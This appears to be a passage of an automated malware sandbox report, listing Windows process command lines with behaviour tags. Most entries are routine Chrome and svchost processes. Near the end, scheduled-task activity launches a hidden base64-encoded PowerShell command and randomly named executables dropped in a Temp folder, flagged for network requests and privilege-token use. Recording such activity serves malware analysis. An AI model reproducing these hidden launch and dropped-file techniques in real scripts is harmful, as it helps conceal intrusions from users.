C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5944 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3032 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2492 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6176 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4336 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5280 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5240 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2320 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2188 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1432 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3056 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6412 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7232 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6520 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7944 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8004 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1048 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7632 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7652 /prefetch:12⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c2⤵
-
C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe"C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe"3⤵
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /cr3⤵
-
C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe"C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe"3⤵
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core3⤵
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\IVmgCHF.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\IVmgCHF.exe uG /site_id 394347 /S2⤵
-
